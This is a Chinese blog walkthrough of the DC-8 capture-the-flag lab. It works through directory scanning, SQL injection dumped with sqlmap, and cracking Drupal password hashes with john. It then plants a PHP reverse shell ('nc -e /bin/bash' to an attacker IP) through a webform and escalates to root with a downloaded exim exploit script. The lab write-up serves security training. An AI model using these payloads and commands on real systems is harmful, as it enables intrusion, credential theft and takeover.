当前位置:网站首页>DC-8靶场下载及渗透实战详细过程(DC靶场系列)
DC-8靶场下载及渗透实战详细过程(DC靶场系列)
2022-08-10 22:11:00 【金 帛】
目录
DC-8靶场下载地址https://www.five86.com/downloads/DC-8.zip
一. 信息收集
1. 主机扫描
2. 端口扫描
3. 目录扫描
dirsearch -u 192.168.120.143 -e * -x 403 --random-agent
4. 页面探测
又是Drupal
确认Drupal版本7.67,该版本网上找不到漏洞,但是有源码,额,总不会让我们去挖这个的漏洞吧!?
探索发现,以前点那啥蓝色字体的时候会转跳到Drupal的官方,而这里就只加了参数nid,非常可疑,可能存在有SQL注入、xss等漏洞
二. 渗透过程
1. SQL注入
在nid参数后面加'
出现了SQL报错,接下来就上SQLmap跑了,爆一下数据库
sqlmap -u "http://192.168.120.143/?nid=1" --level=5 --risk=3 --batch --current-db
爆表
sqlmap -u "http://192.168.120.143/?nid=1" --level=5 --risk=3 --batch -D 'd7db' -tables
有一堆表,但是有用的只有users,接着爆字段名
sqlmap -u "http://192.168.120.143/?nid=1" --level=5 --risk=3 --batch -D 'd7db' -T 'users' -columns
接着看字段
sqlmap -u "http://192.168.120.143/?nid=1" --level=5 --risk=3 --batch -D 'd7db' -T 'users' -C'name,pass,uid' -dump
得到了两个用户,还有hash密文,我们建一个文件,将两个密文保存起来
2. 爆破密文
Drupal的hash密文是经过特殊加密的,用john进行爆破
john hash.txt
爆破出了一个密码turtle
3. 反弹shell
测试发现是john的密码,在/user/login处登入,探索发现在WEBFORM处可以编辑并执行PHP代码
不多bb,直接写入反弹shell
<?php
exec("nc -e /bin/bash 192.168.120.129 6666");
?>
将提交重定向行Confirmation page(确认页面)给勾上,然后滑下点保存,联系随便填入联系表单,点击发送,触发PHP代码
反弹shell成功!
4. 提权
找查一下suid权限的二进制文件
find / -perm -4000 -print 2>/dev/null
之前的DC靶场机exim4提权都失败了,这里再试一下,先看一下版本
exim --version
exim 4.89
接着找一下漏洞
searchsploit exim 4
复制一下文件
cp /usr/share/exploitdb/exploits/linux/local/46996.sh hack.sh
开启http服务
python -m http.server 8888
在DC-7中下载该文件,先跳到tmp目录
cd /tmp
wget 192.168.120.129:8888/hack.sh
接着查看一下文件权限
ls -la
可以看到文件是不可执行的,我们可以用chmod命令赋予执行权限
chmod 777 hack.sh
接着根据sh脚本提示,执行文件
./hack.sh -m netcat
提权成功,有点奇怪就是过一会root权限就消失了,所以动作要快
5. 找查flag
在root目录下发现flag文件
拿到flag!!!
边栏推荐
- APP UI自动化测试常见面试题,或许有用呢~
- MySQL:MySQL的集群——主从复制的原理和配置
- LeetCode Daily 2 Questions 02: Reverse the words in a string (1200 each)
- 电力系统潮流计算(牛顿-拉夫逊法、高斯-赛德尔法、快速解耦法)(Matlab代码实现)
- MySQL高级指令
- The Thread State,
- 威纶通触摸屏如何在报警的同时,显示出异常数据的当前值?
- 《DevOps围炉夜话》- Pilot - CNCF开源DevOps项目DevStream简介 - feat. PMC成员胡涛
- 学会开会|成为有连接感组织的重要技能
- 美味的佳肴
猜你喜欢
阿里云新增三大高性能计算解决方案,助力生命科学行业快速发展
接口测试的概念、目的、流程、测试方法有哪些?
什么是Jmeter?Jmeter使用的原理步骤是什么?
为什么一般公司面试结束后会说「回去等消息」,而不是直接告诉面试者结果?
留言有奖|OpenBMB x 清华大学NLP:大模型公开课更新完结!
阿里云张新涛:支持沉浸式体验应用快速落地,阿里云云XR平台发布
Distribution Network Expansion Planning: Consider Decisions Using Probabilistic Energy Production and Consumption Profiles (Matlab Code Implementation)
计算需要的MIPI lane数目
The Thread State,
这款可视化工具神器,更直观易用!太爱了
随机推荐
QT笔记——用VS + qt 生成dll 和 调用生成的dll
带着昇腾去旅行:一日看尽金陵城里的AI胜景
德科立科创板上市:年营收7.3亿 市值59亿
These must-know JVM knowledge, I have sorted it out with a mind map
MySQL Advanced Commands
xshell (sed 命令)
A shell script the for loop statements, while statement
file IO-buffer
Merge k sorted linked lists
LeetCode每日一题(1573. Number of Ways to Split a String)
What are the concepts, purposes, processes, and testing methods of interface testing?
How to be a Righteous Hacker?What should you study?
Research on multi-element N-k fault model of power system based on AC power flow (implemented by Matlab code) [Power System Fault]
Shell programming specification and variables
shell编程之免交互
【640. Solving Equations】
Service - DNS forward and reverse domain name resolution service
Black cat takes you to learn Makefile Part 11: When the header file a.h changes, how to recompile all the .c files that depend on the header file a.h
什么是Jmeter?Jmeter使用的原理步骤是什么?
学会开会|成为有连接感组织的重要技能